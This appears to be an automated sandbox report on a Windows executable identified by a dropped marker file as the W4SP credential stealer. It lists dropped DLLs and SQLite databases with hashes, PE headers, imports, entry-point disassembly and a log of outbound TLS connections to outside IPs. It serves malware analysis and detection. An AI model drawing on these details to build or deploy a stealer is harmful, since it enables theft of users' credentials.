                                                                                                                                                                                          SHA1:1816FC83155D01351E191D583C68E722928CCE40
                                                                                                                                                                                          SHA-256:1AFD7F650596AD97FCF358B0E077121111641C38CA9D53132BAB4C9588CF262F
                                                                                                                                                                                          SHA-512:A033CE87C2E503B386FB92AA79A7EC14D6C96E4A35D0CB76D4989BACD16F44C4ED5AC4E13057F05F9D199A3FD8545B9A25296515EC456F29C464D949FF34942A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J.O.......A.......N.......K.......G.......@...C......Y...B...Y...B...Y...B...Y...B...RichC...........................PE..d....l.d.........." ...$.............................................................D....`.........................................px...".............................../...........*..T............................(..@...............8............................text............................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1141016
                                                                                                                                                                                          Entropy (8bit):5.435066249596469
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:P3EYbfjwR6nbsonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1JD:PUYbMB0IDJcjEwPgPOG6Xyd461JD
                                                                                                                                                                                          MD5:1905B5D0F945499441E8CD58EB123D86
                                                                                                                                                                                          SHA1:117E584E6FCC0E8CFC8E24E3AF527999F14BAC30
                                                                                                                                                                                          SHA-256:B1788B81FA160E5120451F9252C7745CDDE98B8CE59BF273A3DD867BB034C532
                                                                                                                                                                                          SHA-512:ED88CD7E3259239A0C8D42D95FA2447FC454A944C849FA97449AD88871236FEFDAFE21DBFA6E9B5D8A54DDF1D5281EC34D314CB93D47CE7B13912A69D284F522
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.@..........P*..............................................J.....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10
                                                                                                                                                                                          Entropy (8bit):2.4464393446710155
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:tWIP:km
                                                                                                                                                                                          MD5:885D4687480CE5CE35AB3654BD1BF789
                                                                                                                                                                                          SHA1:F75D633E222D4417C6C7ED6D1CA34048E7E49C4B
                                                                                                                                                                                          SHA-256:018345DCF5D8B0A2BC3932C1E9AC9FC8D4252BC7CE26FDA2FD6A607BECBD42DE
                                                                                                                                                                                          SHA-512:6C4860754DB734A94167D3D4F8F618EECB56C9AF58047761523E2F64B3B147F01472122449D3C4DB92DBC8A6F58B74D7C15B6729A32D8038F61B55632890529F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:2023-09-08
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:qn:qn
                                                                                                                                                                                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:blat
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:v1PWgkpg1qreCS:FWhpg1qreCS
                                                                                                                                                                                          MD5:CE49C0050F7F067FF769599925706543
                                                                                                                                                                                          SHA1:A9D5EC8DA3F6274D60D4963746F345CA44716006
                                                                                                                                                                                          SHA-256:16838507DB2CF241FB39AE1AC56A4A22855C76081471FE6905A705CF0E312445
                                                                                                                                                                                          SHA-512:09BD14164EF64FDB6BBEB16BF435EDE2C809D1486B641A765B1900F734E8F73542A89E7BEC6E2094A08DB4AFC28C442AF98890828D4A95AFF34C5FF9C87E6488
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<--W4SP STEALER ON TOP-->....
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:v1PWgkpg1qreCS:FWhpg1qreCS
                                                                                                                                                                                          MD5:CE49C0050F7F067FF769599925706543
                                                                                                                                                                                          SHA1:A9D5EC8DA3F6274D60D4963746F345CA44716006
                                                                                                                                                                                          SHA-256:16838507DB2CF241FB39AE1AC56A4A22855C76081471FE6905A705CF0E312445
                                                                                                                                                                                          SHA-512:09BD14164EF64FDB6BBEB16BF435EDE2C809D1486B641A765B1900F734E8F73542A89E7BEC6E2094A08DB4AFC28C442AF98890828D4A95AFF34C5FF9C87E6488
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<--W4SP STEALER ON TOP-->....
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                          Entropy (8bit):0.7876734657715041
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                          Entropy (8bit):0.4393511334109407
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                                                                                                          MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                                                                                                          SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                                                                                                          SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                                                                                                          SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Entropy (8bit):7.996773928931689
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:KzqQe0QtRd.exe
                                                                                                                                                                                          File size:14'042'365 bytes
                                                                                                                                                                                          MD5:7fe90dcf5c49fd85ce12939b8cc3315c
                                                                                                                                                                                          SHA1:0f374492f754c2f4693dfba41c190ff66c87be3b
                                                                                                                                                                                          SHA256:60ee0d0e9f0799545b6d1739f6554a1591bf62c6efaee94f48fea42e7d4e4f1f
                                                                                                                                                                                          SHA512:891dac19537497487f09587acb243676d73dc3c11dfe6bb65a82693a550699a2be24b1835d65d4bbd9f274fcfe5b0817ab8ca55f4c96a7b34710af873f0b1b33
                                                                                                                                                                                          SSDEEP:196608:PnEZYDwGcsAgejtcGfcY3gtywIf7E5MsFwMF8SMjdeuFtU3gjcHu6wpE/U:f4Yk3meBcGfdlYMO8KuF23gjqur5
                                                                                                                                                                                          TLSH:81E63312D26919E5CDD3003AC641C525DBA27CA69B60C38F03B0949A2FAB9DC7D7FF61
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r................
                                                                                                                                                                                          Icon Hash:eb2321602321138b
                                                                                                                                                                                          Entrypoint:0x14000b340
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x64EB97F0 [Sun Aug 27 18:37:36 2023 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                          OS Version Minor:2
                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                          File Version Minor:2
                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                                                                          Import Hash:0b5552dccd9d0a834cea55c0c8fc05be
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                          call 00007F6EF4D32C1Ch
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                          jmp 00007F6EF4D3282Fh
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                          call 00007F6EF4D33194h
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007F6EF4D329D3h
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          mov eax, dword ptr [00000030h]
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                          jmp 00007F6EF4D329B7h
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          cmp ecx, eax
                                                                                                                                                                                          je 00007F6EF4D329C6h
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          cmpxchg dword ptr [000411ECh], ecx
                                                                                                                                                                                          jne 00007F6EF4D329A0h
                                                                                                                                                                                          xor al, al
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                          ret
                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                          jmp 00007F6EF4D329A9h
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          inc eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                          movzx eax, byte ptr [000411D7h]
                                                                                                                                                                                          test ecx, ecx
                                                                                                                                                                                          mov ebx, 00000001h
                                                                                                                                                                                          cmove eax, ebx
                                                                                                                                                                                          mov byte ptr [000411C7h], al
                                                                                                                                                                                          call 00007F6EF4D32F93h
                                                                                                                                                                                          call 00007F6EF4D340C2h
                                                                                                                                                                                          test al, al
                                                                                                                                                                                          jne 00007F6EF4D329B6h
                                                                                                                                                                                          xor al, al
                                                                                                                                                                                          jmp 00007F6EF4D329C6h
                                                                                                                                                                                          call 00007F6EF4D406A1h
                                                                                                                                                                                          test al, al
                                                                                                                                                                                          jne 00007F6EF4D329BBh
                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                          call 00007F6EF4D340D2h
                                                                                                                                                                                          jmp 00007F6EF4D3299Ch
                                                                                                                                                                                          mov al, bl
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          add esp, 20h
                                                                                                                                                                                          pop ebx
                                                                                                                                                                                          ret
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          inc eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          dec eax
                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                          cmp byte ptr [0004118Ch], 00000000h
                                                                                                                                                                                          mov ebx, ecx
                                                                                                                                                                                          jne 00007F6EF4D32A19h
                                                                                                                                                                                          cmp ecx, 01h
                                                                                                                                                                                          jnbe 00007F6EF4D32A1Ch
                                                                                                                                                                                          call 00007F6EF4D330FAh
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007F6EF4D329DAh
                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3bcd40x78.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1730.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20a0.pdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000x758.reloc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x394800x1c.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x393400x140.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x10000x288300x28a00False0.5571334134615384data6.48139234696373IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rdata0x2a0000x12ade0x12c00False0.5151171875data5.822765086998648IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .data0x3d0000x103f80xe00False0.13309151785714285DOS executable (block device driver \377\3)1.8096886543499544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .pdata0x4e0000x20a00x2200False0.4749540441176471data5.22608226661587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          _RDATA0x510000x15c0x200False0.38671875data2.734076656433961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rsrc0x520000x17300x1800False0.32763671875data4.785639358631937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .reloc0x540000x7580x800False0.544921875data5.2576643703968475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                          RT_ICON0x520e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.28330206378986866
                                                                                                                                                                                          RT_GROUP_ICON0x531900x14data1.1
                                                                                                                                                                                          RT_MANIFEST0x531a40x58aXML 1.0 document, ASCII text, with CRLF line terminators0.44569816643159377
                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                          KERNEL32.dllGetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                          ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                          GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Sep 8, 2023 07:31:25.403422117 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:25.403506994 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:25.403609037 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:25.405745983 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:25.405792952 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:25.406275988 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:25.406322956 CEST4434971651.38.43.18192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:25.406389952 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:26.021878004 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.022788048 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.022819042 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.024768114 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.024854898 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.027950048 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.028074980 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.028151989 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.071939945 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.072010040 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.122579098 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.411731958 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.411847115 CEST44349715173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.411979914 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.412825108 CEST49715443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:26.749906063 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:26.749969006 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.750046015 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:26.751420021 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:26.751450062 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.714685917 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.715256929 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:27.715291023 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.716722012 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.716814041 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:27.719479084 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:27.719530106 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:27.719620943 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.775213003 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:27.775262117 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:27.822081089 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:28.044123888 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.044238091 CEST44349717159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.044306993 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:28.045213938 CEST49717443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:28.415219069 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.415282965 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.415355921 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.417104006 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.417149067 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.764024973 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.764787912 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.764821053 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.767004013 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.767096996 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.770740032 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.770874023 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.771119118 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.771131992 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.771281958 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:28.815485001 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:29.322201967 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:29.322360039 CEST44349718162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:29.322525978 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:29.323836088 CEST49718443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:30.204214096 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:30.204266071 CEST4434971651.38.43.18192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:31.218100071 CEST4434971651.38.43.18192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:31.219779968 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:31.219852924 CEST4434971651.38.43.18192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:31.222938061 CEST4434971651.38.43.18192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:31.223201990 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:31.226089954 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:31.226419926 CEST49716443192.168.2.751.38.43.18
                                                                                                                                                                                          Sep 8, 2023 07:31:31.913831949 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:31.913903952 CEST44349719173.231.16.76192.168.2.7
